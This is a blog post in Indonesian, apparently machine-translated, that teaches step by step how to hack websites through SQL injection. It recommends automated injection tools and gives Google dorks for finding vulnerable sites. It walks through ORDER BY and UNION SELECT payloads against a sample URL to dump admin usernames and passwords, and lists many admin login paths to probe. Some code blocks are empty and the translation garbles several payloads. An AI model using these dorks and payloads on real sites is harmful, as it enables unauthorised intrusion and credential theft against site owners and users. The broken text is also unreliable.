Alat perdagangan:Tidak banyak alat tapi beberapa yang di luar sana bekerja cukup baik.
Alat pertama saya ingin cover HackBar tersebut. Ini adalah plugin untuk firefox dan saya pikir mereka sekarang memiliki satu untuk krom. Ini benar-benar berguna untuk SQLi, dan benar-benar membantu mempercepat injeksi manual.Kode:https://addons.mozilla.org/en-us/firefox/addon/hackbar/
Alat berikutnya saya akan mencakup adalah scanner SQLi. Ini adalah alat yang secara otomatis akan memindai Dorks untuk Anda dan cek untuk situs rentan. Contoh akan:Kode:http://dreamkiller.byethost17.com/sqli/
Alat Berikutnya aku akan menutupi adalah pencari halaman admin. Ini adalah penyebab alat yang hebat memungkinkan wajah itu, dapat mengambil waktu yang lama untuk menemukan halaman admin jadi mengapa tidak memiliki script yang melakukannya untuk Anda cukup cepat.Kode:http://sc0rpion.ir/af/
Alat terakhir saya akan cover Havij. Havij adalah alat yang secara otomatis menyuntikkan situs untuk Anda. Aku benar-benar tidak suka orang yang menggunakan alat ini, terutama karena 90% dari orang-orang yang bahkan tidak tahu hal pertama tentang SQLi. Saya akan merekomendasikan hal ini meskipun jika Anda tahu bagaimana melakukan SQLi dan hanya mencoba untuk mendapatkan dump karena akan membantu mempercepat proses.Kode:] Http://www.itsecteam.com/en/projects/project1.htm
Bagian satu: Web penilaian HalamanJadi ini adalah awal dari hacking situs web. Dalam rangka untuk hack situs web Anda perlu tahu apakah itu rentan atau tidak. Anda juga perlu tahu apa versi itu sehingga Anda tahu apa metode injeksi untuk digunakan. Aku akan menutupi semua itu di bagian ini jadi mari kita mulai.
Bagian satu - Mencari situs rentan / memeriksa kerentanan.Cara terbaik untuk menemukan situs yang rentan adalah dengan menggunakan Dorks. Dorks adalah situs URL yang diketahui rentan. Dalam injeksi SQL ini Dorks terlihat seperti ini:Kode:trainers.php? id =article.php? ID =play_old.php id =?declaration_more.php? decl_id =Pageid =games.php? id =newsDetail.php id =?staff_id =historialeer.php? num =produk-item.php? id =news_view.php? id =humor.php? id =communique_detail.php id =?sem.php3 id =?opinions.php? id =spr.php? id =pages.php? id =chappies.php? id =prod_detail.php id =?viewphoto.php? id =view.php? id =website.php? id =hosting_info.php? id =gery.php? id =ID = detail.php?publications.php? id =Productinfo.php? Id =releases.php? id =ray.php? id =produit.php? id =pop.php? id =shopping.php? id =productdetail.php id =?post.php? id =section.php id =?theme.php? id =page.php? id =shredder-categories.php? id =product_ranges_view.php? ID =shop_category.php? id =channel_id =NewSID =news_display.php getId =?ages.php? id =clanek.php4? id =review.php? id =iniziativa.php? di =curriculum.php? id =labels.php? id =look.php? ID =galeri_info.php l =?tekst.php IDT =?newscat.php? id =newsticker_info.php idn =?rubrika.php idr =?offer.php? IDF =Sekarang untuk menggunakan dork Anda pergi ke google dan cari "inurl: dork Anda" seperti ini.Kode:inurl: games.php id =?Anda tidak diizinkan untuk melihat link. Daftar atau Login untuk melihat.
Sekarang setelah pemindaian konyol hanya menavigasi ke halaman. Untuk memeriksa apakah itu rentan semua yang perlu Anda lakukan adalah menambahkan 'pada akhir url seperti iniKode:http://www.vunlerable.com/games.php?id=56 '
Jika Anda mendapatkan error seperti ini atau sesuatu seperti itu, maka rentan terhadap injeksi.Kode:Peringatan: mysql_fetch_array (): argumen yang diberikan bukanlah sebuah hasil resource MySQL yang valid di / home1/michafj0/public_html/gallery.php on line 7
Bagian dua - Mencari jumlah kolom.Agar kita dapat menggunakan perintah dan mendapatkan hasil kita harus tahu berapa banyak kolom yang ada pada website. Jadi untuk menemukan jumlah kolom kita harus menggunakan perintah ORDER BY. Anda mulai dengan 1 dan terus naik sampai situs menghasilkan kesalahan seperti ini:Kode:<tidak error> http://www.vunlerable.com/games.php?id=56+order+by+1--<tidak error> http://www.vunlerable.com/games.php?id=56+order+by+2--<tidak error> http://www.vunlerable.com/games.php?id=56+order+by+3--<tidak error> http://www.vunlerable.com/games.php?id=56+order+by+4--http://www.vunlerable.com/games.php?id=56+order+by+5-- <Error>
Jadi karena kita punya dan kesalahan pada order by 5 tetapi tidak pada pesanan dengan 4, yang berarti bahwa jumlah kolom adalah 4.
Bagian tiga - Menemukan kolom rentanLangkah ini akan menunjukkan kepada kita apa kolom rentan sehingga kita dapat menyuntikkan mereka. Untuk melakukan ini kita harus menggunakan pernyataan UNION SELECT. Juga harap dicatat untuk bekerja dengan baik Anda harus menambahkan - setelah = seperti id ini =- 56Kode:,2,3,4 http://www.vunlerable.com/games.php?id=-56+union+select+1 -
Setelah melakukan ini, Anda akan melihat nomor pada halaman di mana informasi normal. Ini adalah kolom yang kita dapat menyuntikkan untuk tutorial saya kita akan mengatakan bahwa 2 dan 4 datang. Ini berarti bahwa 2 kolom dan kolom untuk dapat disuntikkan.
Bagian empat - Menemukan versiJadi sekarang bahwa kita memiliki jumlah kolom dan tahu apa yang kolom dapat disuntikkan kita perlu mencari tahu apa yang versi SQL server. Untuk melakukan ini kita memasukkan versi atau versi @ @ ke kolom injeksi.Kode:http://www.vunlerable.com/games.php?id=-56+union+select+1, versi () ,3,4 -
Sekarang harus kembali mengatakan sesuatu seperti ini di mana nomor yang berada di pada halaman.Kode:5.1.47-komunitas-logJika versi 4.something kemudian melihat Bagian tiga untuk belajar bagaimana menyuntikkan.
Bagian dua: Menyuntikkan versi 5 +Jadi sekarang kita tahu versi saatnya untuk mulai bekerja untuk mendapatkan informasi dari situs.
Bagian satu - Mendapatkan nama tabelOk jadi untuk mendapatkan nama tabel semua melakukan secara harfiah hanya meminta untuk mereka. Sejak versi 5 + memiliki database information_schema kita hanya bisa meminta database tabel. Untuk melakukan hal ini hanya menggunakan perintah berikut.Kode:
Yang akan menampilkan semua nama tabel, yang di topi yang tidak diperlukan sehingga Anda dapat mengabaikan mereka. Jika ada satu di akhir yang muncul harus dipotong berarti ini ada terlalu banyak untuk ditampilkan. Untuk memperbaiki yang kita gunakan perintah batas. Jika hanya 10 muncul dan yang 11 adalah dipotong kemudian menggunakannya seperti ini.Kode:
Bagian dua - Mendapatkan nama kolomOK sekarang bahwa kita memiliki nama tabel yang kita butuhkan untuk memilih meja untuk mendapatkan nama kolom dari. Yang paling umum mencari yang akan admin atau pengguna, sesuatu seperti itu. Jadi untuk tutorial ini kita akan mengatakan ada tabel bernama admin. Untuk mendapatkan nama kolom yang Anda butuhkan untuk mendapatkan nilai ASCII dari nama tabel. Nilai ASCII untuk admin ini 97.100.109.105.110 jadi sekarang bahwa kita memiliki nilai ASCII tabel memungkinkan mendapatkan nama kolom.Kode:
Sekarang akan menunjukkan kepada kita beberapa seperti nama kolom user_id, username, password, dan email.
Bagian tiga - Mendapatkan dataSekarang untuk bagian yang terbaik. Sudah waktunya untuk mendapatkan data yang kita inginkan. Apa yang kita lakukan adalah kinda seperti dua langkah terakhir tapi bukannya bertanya information_schema kita akan meminta data tabel kita adalah seperti ini.Kode:
Sekarang Anda akan melihat 0x3a antara setiap coulmn kami meminta data dari. Yah itu hanya hex untuk: itu membuat lebih mudah untuk membaca hasil.
Bagian empat - Menemukan halaman adminTergantung pada apa yang Anda coba lakukan, mendapatkan halaman admin biasanya sesuatu yang dibutuhkan. Ada dua cara anda dapat melakukan ini, alat atau manual. Yang paling efektif adalah hanya untuk menggunakan halaman admin sehingga Anda tidak perlu menghabiskan waktu menebak itu. Saya pikir Anda bisa setidaknya mencoba standar itu jika Anda tahu mereka di sini adalah daftar yang baik jika Anda tidak.Kode:http://www.vunlerable.com/admin/login.htmlKode:admin.phplogin.htmlogin.htmllogin /login.phpadm /admin /admin / account.htmladmin / login.htmladmin / login.htmadmin / home.phpadmin / controlpanel.htmladmin / controlpanel.htmadmin / cp.PHPadmin / adminLogin.htmladmin / adminLogin.htmadmin / admin_login.PHPadmin / controlpanel.PHPadmin / admin-login.phpadmin-login.phpadmin / account.PHPadmin / admin.phpadmin.htmadmin.htmladminitem /adminitem.PHPadminitems /adminitems.PHPadministrator /administrator / login.phpadministrator.PHPadministrasi /administration.PHPadminLogin /adminlogin.PHPadmin_area / admin.phpadmin_area /admin_area / login.phpmanajer /manager.PHPletmein /letmein.PHPsuperuser /superuser.PHPakses /access.phpsysadm /sysadm.PHPsuperman /pengawas /panel.PHPkontrol /control.PHPanggota /member.phpanggota /members.PHPpengguna /user.phpcp /uvpanel /mengelola /manage.PHPmanajemen /management.PHPsignin /signin.PHPlog in /log-in.PHPlog_in /log_in.PHPsign_in /sign_in.PHPsign-in /tanda-in.PHPpengguna /users.PHPaccount /accounts.PHPwp-login.phpbb-admin/login.PHPbb-admin/admin.PHPbb-admin/admin.htmladministrator / account.PHPrelogin.htmrelogin.htmlcheck.PHPrelogin.PHPprocesslogin.PHPchecklogin.PHPcheckuser.PHPcheckadmin.PHPisadmin.PHPauthenticate.PHPauthentication.PHPauth.PHPauthuser.PHPauthadmin.PHPcp.PHPmodelsearch / login.phpmoderator.PHPmoderator /ControlPanel /controlpanel.PHPadmincontrol.PHPadminpanel.PHPfileadmin /fileadmin.PHPsysadmin.PHPadmin1.PHPadmin1.htmladmin1.htmadmin2.PHPadmin2.htmlyonetim.PHPyonetim.htmlyonetici.PHPyonetici.htmlphpmyadmin /MyAdmin /ur-admin.phpur-admin /Server.PHPServer /wp-admin /administr8.PHPadministr8 /webadmin /webadmin.PHPadministratie /admin /admins.PHPadministrivia /Database_Administration /useradmin /sysadmin /admin1 /sistem administrasi /administrator /pgAdmin /DirectAdmin /staradmin /ServerAdministrator /Sysadmin /mengelola /LiveUser_Admin /sys-admin /TYPO3 /panel /cpanel /cpanel_file /platz_login /rcLogin /blogindex /formslogin /autologin /support_login /meta_login /manuallogin /simpleLogin /loginflat /utility_login /showlogin /memlogin /login-redirect /sub-login /wp-login /login1 /dir-login /login_db /xlogin /smblogin /customer_login /UserLogin /login-kami /acct_login /bigadmin /proyek-admin /phpPgAdmin /pureadmin /sql-admin /radmind /openvpnadmin /wizmysqladmin /vadmind /ezsqliteadmin /hpwebjetadmin /newsadmin /adminpro /Lotus_Domino_Admin /bbadmin /vmailadmin /Indy_admin /ccp14admin /irc-macadmin /banneradmin /sshadmin /phpldapadmin /macadmin /administratoraccounts /admin4_account /admin4_colon /radmind-1 /Super-Admin /AdminTools /cmsadmin /SysAdmin2 /globes_admin /cadmins /phpSQLiteAdmin /navSiteAdmin /server_admin_small /logo_sysadmin /power_user /system_administration /ss_vms_admin_sm /bb-admin /panel-administracion /instadmin /memberadmin /administratorlogin /adm.PHPadmin_login.PHPpanel-administracion/login.PHPhalaman / admin / admin-login.phphalaman / admin /acceso.PHPAdminCP / login.phpAdminCP /adminarea /admincontrol /affiliate.PHPadm_auth.PHPmemberadmin.PHPadministratorlogin.PHPmodul / admin /administrators.PHPsiteadmin /siteadmin.PHPadminsite /kpanel /vorod /vorod.PHPvorud /vorud.PHPadminpanel /PSUser /aman /webmaster /webmaster.PHPautologin.PHPuserlogin.PHPadmin_area.PHPcmsadmin.PHPkeamanan /usr /root /rahasia /admin / login.phpadmin / adminLogin.PHPmoderator.phpmoderator.htmlmoderator / login.phpmoderator / admin.phpyonetici.PHP0admin /0manager /aadmin /cgi-bin/loginPHPlogin1PHPlogin_admin /login_adminPHPlogin_out /login_outPHPlogin_userPHPLoginerror /loginok /loginsave /loginsuper /loginsuperPHPloginPHPlogout /logoutPHPrahasia /super1 /super1PHPsuper_indexPHPsuper_loginPHPsupermanagerPHPsupermanPHPsuperuserPHPmengawasi /mengawasi / LoginPHPsuperPHP
Bagian Tiga: Menyuntikkan versi> 5Sekarang ini cukup banyak seperti suntikan versi 5 + Satu-satunya perbedaan adalah bahwa Anda harus menebak tabel dan nama kolom. Hal ini karena versi> 5 tidak memiliki database information_schema.Bagian satu - Menebak nama tabelIni adalah bagian bagian yang sulit menebak nama tabel. Cara Anda menebak mereka adalah sebenarnya cukup sederhana. Anda menggunakan perintah serikat pilih seperti biasa kecuali untuk mengakhiri.Kode:http://www.vunlerable.com/games.php?id=56+union+select+1, 2,3,4 + dari + admin - <error>http://www.vunlerable.com/games.php?id=56+union+select+1, 2,3,4 + dari user + - <error>http://www.vunlerable.com/games.php?id=56+union+select+1, 2,3,4 + dari + pengguna - <tidak error>Karena kita punya sekarang error ketika memeriksa apakah ada nama tabel "pengguna" yang akan berarti bahwa meja ada.Bagian dua - Nama Kolom MenebakHal ini dilakukan hampir cara yang sama kita menduga untuk tabel. Hanya sekarang kita menebak nama kolom seperti bagaimana kita meminta data kami.Kode:http://www.vunlerable.com/games.php?id=56+union+select+1, id, 3,4 + dari + admin - <error>http://www.vunlerable.com/games.php?id=56+union+select+1, userid, 3,4 + dari + admin - <error>http://www.vunlerable.com/games.php?id=56+union+select+1, user_id, 3,4 + dari + admin - <tidak error>http://www.vunlerable.com/games.php?id=56+union+select+1, nama, 3,4 + dari + admin - <error>http://www.vunlerable.com/games.php?id=56+union+select+1, nama pengguna, 3,4 + dari + admin - <error>http://www.vunlerable.com/games.php?id=56+union+select+1, user_name, 3,4 + dari + admin - <tidak error>http://www.vunlerable.com/games.php?id=56+union+select+1, sandi, 3,4 + dari + admin - <tidak error>http://www.vunlerable.com/games.php?id=56+union+select+1, email, 3,4 + dari + admin - <error>http://www.vunlerable.com/games.php?id=56+union+select+1, USER_EMAIL, 3,4 + dari + admin - <tidak error>Sekarang kita tahu bahwa kolom user_id, user_name, password, dan USER_EMAIL ada. Kita sekarang dapat melanjutkan untuk mendapatkan data.Bagian tiga - Mendapatkan dataSekarang kita tahu tabel dan nama kolom saatnya untuk mendapatkan data. Bagian besar itu dilakukan dengan cara yang sama Anda lakukan pada versi 5 +Kode:
Kami akan ada di tutorial saya di SQLi Saya harap kalian menyukainya dan belajar sesuatu dari itu. Saya berencana untuk memperbarui ini di masa depan untuk memasukkan SQLi buta dan bagaimana menyuntikkan beberapa login. Jika ada sesuatu yang Anda melihat sesuatu yang salah atau hanya yang harus ditambahkan biarkan aku tahu sehingga aku bisa memperbaiki / menambahkan.
Tidak ada komentar:
Posting Komentar